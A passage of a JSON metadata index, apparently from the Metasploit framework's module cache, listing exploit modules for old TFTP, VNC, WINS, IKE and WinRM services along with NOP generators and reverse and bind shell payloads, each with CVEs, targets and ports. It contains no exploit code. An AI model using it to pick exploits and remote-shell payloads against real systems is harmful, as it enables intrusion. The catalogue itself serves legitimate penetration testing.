"check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/futuresoft_transfermode": { - "name": "FutureSoft TFTP Server 2000 Transfer-Mode Overflow", - "fullname": "exploit/windows/tftp/futuresoft_transfermode", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-05-31", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the FutureSoft TFTP Server\n 2000 product. By sending an overly long transfer-mode string, we were able\n to overwrite both the SEH and the saved EIP. A subsequent write-exception\n that will occur allows the transferring of execution to our shellcode\n via the overwritten SEH. This module has been tested against Windows\n 2000 Professional and for some reason does not seem to work against\n Windows 2000 Server (could not trigger the overflow at all).", - "references": [ - "CVE-2005-1812", - "OSVDB-16954", - "BID-13821" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 Pro English ALL", - "Windows XP Pro SP0/SP1 English", - "Windows NT SP5/SP6a English", - "Windows 2003 Server English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/tftp/futuresoft_transfermode.rb", - "is_install_path": true, - "ref_name": "windows/tftp/futuresoft_transfermode", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/netdecision_tftp_traversal": { - "name": "NetDecision 4.2 TFTP Writable Directory Traversal Execution", - "fullname": "exploit/windows/tftp/netdecision_tftp_traversal", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-05-16", - "type": "exploit", - "author": [ - "Rob Kraus", - "juan vazquez " - ], - "description": "This module exploits a vulnerability found in NetDecision 4.2 TFTP server. The\n software contains a directory traversal vulnerability that allows a remote attacker\n to write arbitrary file to the file system, which results in code execution under\n the context of user executing the TFTP Server.", - "references": [ - "CVE-2009-1730", - "OSVDB-54607", - "BID-35002" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "NetDecision 4.2 TFTP on Windows XP SP3 / Windows 2003 SP2" - ], - "mod_time": "2021-01-28 10:35:25 +0000", - "path": "/modules/exploits/windows/tftp/netdecision_tftp_traversal.rb", - "is_install_path": true, - "ref_name": "windows/tftp/netdecision_tftp_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/opentftp_error_code": { - "name": "OpenTFTP SP 1.4 Error Packet Overflow", - "fullname": "exploit/windows/tftp/opentftp_error_code", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-07-05", - "type": "exploit", - "author": [ - "tixxDZ", - "steponequit" - ], - "description": "This module exploits a buffer overflow in OpenTFTP Server SP 1.4. The vulnerable\n condition triggers when the TFTP opcode is configured as an error packet, the TFTP\n service will then format the message using a sprintf() function, which causes an\n overflow, therefore allowing remote code execution under the context of SYSTEM.\n\n The offset (to EIP) is specific to how the TFTP was started (as a 'Stand Alone',\n or 'Service'). By default the target is set to 'Service' because that's the default\n configuration during OpenTFTP Server SP 1.4's installation.", - "references": [ - "CVE-2008-2161", - "OSVDB-44904", - "BID-29111", - "URL-http://downloads.securityfocus.com/vulnerabilities/exploits/29111.pl" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "OpenTFTP 1.4 Service", - "OpenTFTP 1.4 Stand Alone" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/tftp/opentftp_error_code.rb", - "is_install_path": true, - "ref_name": "windows/tftp/opentftp_error_code", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/quick_tftp_pro_mode": { - "name": "Quick FTP Pro 2.1 Transfer-Mode Overflow", - "fullname": "exploit/windows/tftp/quick_tftp_pro_mode", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-03-27", - "type": "exploit", - "author": [ - "Saint Patrick" - ], - "description": "This module exploits a stack buffer overflow in the Quick TFTP Pro server\n product. MS Update KB926436 screws up the opcode address being used in oledlg.dll resulting\n in a DoS. This is a port of a sploit by Mati \"muts\" Aharoni.", - "references": [ - "CVE-2008-1610", - "OSVDB-43784", - "BID-28459", - "URL-http://web.archive.org/web/20080330000001/http://secunia.com:80/advisories/29494/" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Server 2000", - "Windows XP SP2" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/tftp/quick_tftp_pro_mode.rb", - "is_install_path": true, - "ref_name": "windows/tftp/quick_tftp_pro_mode", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/tftpd32_long_filename": { - "name": "TFTPD32 Long Filename Buffer Overflow", - "fullname": "exploit/windows/tftp/tftpd32_long_filename", - "aliases": [], - "rank": 200, - "disclosure_date": "2002-11-19", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in TFTPD32 version 2.21\n and prior. By sending a request for an overly long file name\n to the tftpd32 server, a remote attacker could overflow a buffer and\n execute arbitrary code on the system.", - "references": [ - "CVE-2002-2226", - "OSVDB-45903", - "BID-6199" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows NT 4.0 SP6a English", - "Windows 2000 Pro SP4 English", - "Windows XP Pro SP0 English", - "Windows XP Pro SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/tftp/tftpd32_long_filename.rb", - "is_install_path": true, - "ref_name": "windows/tftp/tftpd32_long_filename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/tftpdwin_long_filename": { - "name": "TFTPDWIN v0.4.2 Long Filename Buffer Overflow", - "fullname": "exploit/windows/tftp/tftpdwin_long_filename", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-09-21", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending\n an overly long file name to the tftpd.exe server, the stack can be overwritten.", - "references": [ - "CVE-2006-4948", - "OSVDB-29032", - "BID-20131", - "EDB-3132" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal - tftpd.exe" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/tftp/tftpdwin_long_filename.rb", - "is_install_path": true, - "ref_name": "windows/tftp/tftpdwin_long_filename", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/tftpserver_wrq_bof": { - "name": "TFTP Server for Windows 1.4 ST WRQ Buffer Overflow", - "fullname": "exploit/windows/tftp/tftpserver_wrq_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-03-26", - "type": "exploit", - "author": [ - "Mati Aharoni", - "Datacut" - ], - "description": "This module exploits a vulnerability found in TFTP Server 1.4 ST. The flaw\n is due to the way TFTP handles the filename parameter extracted from a WRQ request.\n The server will append the user-supplied filename to TFTP server binary's path\n without any bounds checking, and then attempt to check this path with a fopen().\n Since this isn't a valid file path, fopen() returns null, which allows the\n corrupted data to be used in a strcmp() function, causing an access violation.\n\n Since the offset is sensitive to how the TFTP server is launched, you must know\n in advance if your victim machine launched the TFTP as a 'Service' or 'Standalone'\n , and then manually select your target accordingly. A successful attempt will lead\n to remote code execution under the context of SYSTEM if run as a service, or\n the user if run as a standalone. A failed attempt will result a denial-of-service.", - "references": [ - "CVE-2008-1611", - "OSVDB-43785", - "BID-18345", - "EDB-5314" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2/SP3 EN Service Mode", - "Windows XP SP2/SP3 EN Standalone Mode", - "Windows 7 SP0/SP1 EN x64 Service Mode", - "Windows 7 SP0/SP1 EN x64 Standalone Mode", - "Windows 7 SP0/SP1 EN x86 Service Mode", - "Windows 7 SP0/SP1 EN x86 Standalone Mode" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb", - "is_install_path": true, - "ref_name": "windows/tftp/tftpserver_wrq_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/tftp/threectftpsvc_long_mode": { - "name": "3CTftpSvc TFTP Long Mode Buffer Overflow", - "fullname": "exploit/windows/tftp/threectftpsvc_long_mode", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-11-27", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in 3CTftpSvc 2.0.1. By\n sending a specially crafted packet with an overly long mode\n field, a remote attacker could overflow a buffer and execute\n arbitrary code on the system.", - "references": [ - "CVE-2006-6183", - "OSVDB-30758", - "BID-21301", - "URL-http://web.archive.org/web/20070521014920/http://secunia.com:80/advisories/23113" - ], - "platform": "Windows", - "arch": "", - "rport": 69, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "3CTftpSvc 2.0.1" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/tftp/threectftpsvc_long_mode.rb", - "is_install_path": true, - "ref_name": "windows/tftp/threectftpsvc_long_mode", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/unicenter/cam_log_security": { - "name": "CA CAM log_security() Stack Buffer Overflow (Win32)", - "fullname": "exploit/windows/unicenter/cam_log_security", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-08-22", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a vulnerability in the CA CAM service\n by passing a long parameter to the log_security() function.\n The CAM service is part of TNG Unicenter. This module has\n been tested on Unicenter v3.1.", - "references": [ - "CVE-2005-2668", - "OSVDB-18916", - "BID-14622" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "W2API.DLL TNG 2.3", - "Windows 2000 SP0-SP4 English", - "Windows XP SP0-SP1 English", - "Windows XP SP2 English", - "Windows 2003 SP0 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/unicenter/cam_log_security.rb", - "is_install_path": true, - "ref_name": "windows/unicenter/cam_log_security", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/vnc/realvnc_client": { - "name": "RealVNC 3.3.7 Client Buffer Overflow", - "fullname": "exploit/windows/vnc/realvnc_client", - "aliases": [], - "rank": 300, - "disclosure_date": "2001-01-29", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).", - "references": [ - "CVE-2001-0167", - "OSVDB-6281", - "BID-2305" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP4 English", - "Windows XP SP2 English", - "Windows 2003 SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/vnc/realvnc_client.rb", - "is_install_path": true, - "ref_name": "windows/vnc/realvnc_client", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/vnc/ultravnc_client": { - "name": "UltraVNC 1.0.1 Client Buffer Overflow", - "fullname": "exploit/windows/vnc/ultravnc_client", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-04-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in UltraVNC Win32\n Viewer 1.0.1 Release.", - "references": [ - "CVE-2006-1652", - "OSVDB-24456", - "BID-17378" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 SP4 English", - "Windows XP SP2 English", - "Windows 2003 SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/vnc/ultravnc_client.rb", - "is_install_path": true, - "ref_name": "windows/vnc/ultravnc_client", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/vnc/ultravnc_viewer_bof": { - "name": "UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow", - "fullname": "exploit/windows/vnc/ultravnc_viewer_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-02-06", - "type": "exploit", - "author": [ - "noperand" - ], - "description": "This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release.\n\n If a malicious server responds to a client connection indicating a minor\n protocol version of 14 or 16, a 32-bit integer is subsequently read from\n the TCP stream by the client and directly provided as the trusted size for\n further reading from the TCP stream into a 1024-byte character array on\n the stack.", - "references": [ - "CVE-2008-0610", - "OSVDB-42840", - "BID-27561" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/vnc/ultravnc_viewer_bof.rb", - "is_install_path": true, - "ref_name": "windows/vnc/ultravnc_viewer_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/vnc/winvnc_http_get": { - "name": "WinVNC Web Server GET Overflow", - "fullname": "exploit/windows/vnc/winvnc_http_get", - "aliases": [], - "rank": 200, - "disclosure_date": "2001-01-29", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a buffer overflow in the AT&T WinVNC version\n <= v3.3.3r7 web server. When debugging mode with logging is\n enabled (non-default), an overly long GET request can overwrite\n the stack. This exploit does not work well with VNC payloads!", - "references": [ - "BID-2306", - "OSVDB-6280", - "CVE-2001-0168" - ], - "platform": "Windows", - "arch": "", - "rport": 5800, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows NT4 SP3-6", - "Windows 2000 SP1-4", - "Windows XP SP0-1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/vnc/winvnc_http_get.rb", - "is_install_path": true, - "ref_name": "windows/vnc/winvnc_http_get", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/vpn/safenet_ike_11": { - "name": "SafeNet SoftRemote IKE Service Buffer Overflow", - "fullname": "exploit/windows/vpn/safenet_ike_11", - "aliases": [], - "rank": 200, - "disclosure_date": "2009-06-01", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Safenet SoftRemote IKE IreIKE.exe\n service. When sending a specially crafted udp packet to port 62514 an\n attacker may be able to execute arbitrary code. This module has\n been tested with Juniper NetScreen-Remote 10.8.0 (Build 20) using\n windows/meterpreter/reverse_ord_tcp payloads.", - "references": [ - "CVE-2009-1943", - "OSVDB-54831", - "BID-35154", - "URL-http://reversemode.com/index.php?option=com_content&task=view&id=63&Itemid=1" - ], - "platform": "Windows", - "arch": "", - "rport": 62514, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "SafeNet Irelke 10.8.0.20", - "SafeNet Irelke 10.8.0.10", - "SafeNet Irelke 10.8.3.6" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/vpn/safenet_ike_11.rb", - "is_install_path": true, - "ref_name": "windows/vpn/safenet_ike_11", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/winrm/winrm_script_exec": { - "name": "WinRM Script Exec Remote Code Execution", - "fullname": "exploit/windows/winrm/winrm_script_exec", - "aliases": [], - "rank": 0, - "disclosure_date": "2012-11-01", - "type": "exploit", - "author": [ - "thelightcosine" - ], - "description": "This module uses valid credentials to login to the WinRM service\n and execute a payload. It has two available methods for payload\n delivery: Powershell 2 (and above) and VBS CmdStager.\n\n The module will check if Powershell is available, and if so uses\n that method. Otherwise it falls back to the VBS CmdStager which is\n less stealthy.", - "references": [ - "URL-http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 5985, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443, - 5985, - 5986 - ], - "autofilter_services": [ - "http", - "https", - "winrm" - ], - "targets": [ - "Windows" - ], - "mod_time": "2023-01-03 11:26:07 +0000", - "path": "/modules/exploits/windows/winrm/winrm_script_exec.rb", - "is_install_path": true, - "ref_name": "windows/winrm/winrm_script_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/wins/ms04_045_wins": { - "name": "MS04-045 Microsoft WINS Service Memory Overwrite", - "fullname": "exploit/windows/wins/ms04_045_wins", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-12-14", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits an arbitrary memory write flaw in the\n WINS service. This exploit has been tested against Windows\n 2000 only.", - "references": [ - "CVE-2004-1080", - "OSVDB-12378", - "BID-11763", - "MSB-MS04-045" - ], - "platform": "Windows", - "arch": "", - "rport": 42, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/wins/ms04_045_wins.rb", - "is_install_path": true, - "ref_name": "windows/wins/ms04_045_wins", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "nop_aarch64/simple": { - "name": "Simple", - "fullname": "nop/aarch64/simple", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "timwr" - ], - "description": "Simple NOP generator", - "references": [], - "platform": "All", - "arch": "aarch64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/aarch64/simple.rb", - "is_install_path": true, - "ref_name": "aarch64/simple", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_armle/simple": { - "name": "Simple", - "fullname": "nop/armle/simple", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "hdm " - ], - "description": "Simple NOP generator", - "references": [], - "platform": "All", - "arch": "armle", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/armle/simple.rb", - "is_install_path": true, - "ref_name": "armle/simple", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_cmd/generic": { - "name": "Generic Command Nop Generator", - "fullname": "nop/cmd/generic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "hdm ", - "bcoles " - ], - "description": "Generates harmless padding for command payloads.", - "references": [], - "platform": "All", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2022-01-28 15:29:56 +0000", - "path": "/modules/nops/cmd/generic.rb", - "is_install_path": true, - "ref_name": "cmd/generic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_mipsbe/better": { - "name": "Better", - "fullname": "nop/mipsbe/better", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "jm" - ], - "description": "Better NOP generator", - "references": [], - "platform": "All", - "arch": "mipsbe", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/mipsbe/better.rb", - "is_install_path": true, - "ref_name": "mipsbe/better", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_php/generic": { - "name": "PHP Nop Generator", - "fullname": "nop/php/generic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "hdm " - ], - "description": "Generates harmless padding for PHP scripts", - "references": [], - "platform": "All", - "arch": "php", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/php/generic.rb", - "is_install_path": true, - "ref_name": "php/generic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_ppc/simple": { - "name": "Simple", - "fullname": "nop/ppc/simple", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "hdm " - ], - "description": "Simple NOP generator", - "references": [], - "platform": "All", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/ppc/simple.rb", - "is_install_path": true, - "ref_name": "ppc/simple", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_riscv32le/simple": { - "name": "Simple", - "fullname": "nop/riscv32le/simple", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "bcoles " - ], - "description": "Simple NOP generator", - "references": [], - "platform": "All", - "arch": "riscv32le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-10-01 02:46:28 +0000", - "path": "/modules/nops/riscv32le/simple.rb", - "is_install_path": true, - "ref_name": "riscv32le/simple", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_riscv64le/simple": { - "name": "Simple", - "fullname": "nop/riscv64le/simple", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "bcoles " - ], - "description": "Simple NOP generator", - "references": [], - "platform": "All", - "arch": "riscv64le", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-10-01 02:46:28 +0000", - "path": "/modules/nops/riscv64le/simple.rb", - "is_install_path": true, - "ref_name": "riscv64le/simple", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_sparc/random": { - "name": "SPARC NOP Generator", - "fullname": "nop/sparc/random", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "vlad902 " - ], - "description": "SPARC NOP generator", - "references": [], - "platform": "All", - "arch": "sparc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/sparc/random.rb", - "is_install_path": true, - "ref_name": "sparc/random", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_tty/generic": { - "name": "TTY Nop Generator", - "fullname": "nop/tty/generic", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "hdm " - ], - "description": "Generates harmless padding for TTY input", - "references": [], - "platform": "All", - "arch": "tty", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/tty/generic.rb", - "is_install_path": true, - "ref_name": "tty/generic", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_x64/simple": { - "name": "Simple", - "fullname": "nop/x64/simple", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "sf " - ], - "description": "An x64 single/multi byte NOP instruction generator.", - "references": [], - "platform": "All", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/x64/simple.rb", - "is_install_path": true, - "ref_name": "x64/simple", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_x86/opty2": { - "name": "Opty2", - "fullname": "nop/x86/opty2", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "spoonm ", - "optyx " - ], - "description": "Opty2 multi-byte NOP generator", - "references": [], - "platform": "All", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/x86/opty2.rb", - "is_install_path": true, - "ref_name": "x86/opty2", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "nop_x86/single_byte": { - "name": "Single Byte", - "fullname": "nop/x86/single_byte", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "nop", - "author": [ - "spoonm " - ], - "description": "Single-byte NOP generator", - "references": [], - "platform": "All", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-13 11:27:49 +0000", - "path": "/modules/nops/x86/single_byte.rb", - "is_install_path": true, - "ref_name": "x86/single_byte", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false - }, - "payload_aix/ppc/shell_bind_tcp": { - "name": "AIX Command Shell, Bind TCP Inline", - "fullname": "payload/aix/ppc/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Listen for a connection and spawn a command shell", - "references": [], - "platform": "AIX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb", - "is_install_path": true, - "ref_name": "aix/ppc/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_aix/ppc/shell_find_port": { - "name": "AIX Command Shell, Find Port Inline", - "fullname": "payload/aix/ppc/shell_find_port", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Spawn a shell on an established connection", - "references": [], - "platform": "AIX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/aix/ppc/shell_find_port.rb", - "is_install_path": true, - "ref_name": "aix/ppc/shell_find_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_aix/ppc/shell_interact": { - "name": "AIX execve Shell for inetd", - "fullname": "payload/aix/ppc/shell_interact", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "jduck " - ], - "description": "Simply execve /bin/sh (for inetd programs)", - "references": [], - "platform": "AIX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/aix/ppc/shell_interact.rb", - "is_install_path": true, - "ref_name": "aix/ppc/shell_interact", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_aix/ppc/shell_reverse_tcp": { - "name": "AIX Command Shell, Reverse TCP Inline", - "fullname": "payload/aix/ppc/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Ramon de C Valle " - ], - "description": "Connect back to attacker and spawn a command shell", - "references": [], - "platform": "AIX", - "arch": "ppc", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-20 02:57:34 +0000", - "path": "/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "aix/ppc/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 1, - "staged": false - }, - "payload_android/meterpreter/reverse_http": { - "name": "Android Meterpreter, Android Reverse HTTP Stager", - "fullname": "payload/android/meterpreter/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "mihi", - "egypt ", - "OJ Reeves", - "anwarelmakrahy" - ], - "description": "Run a meterpreter server in Android.\n\nTunnel communication over HTTP", - "references": [], - "platform": "Android", - "arch": "dalvik", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/android/reverse_http.rb", - "is_install_path": true, - "ref_name": "android/meterpreter/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - 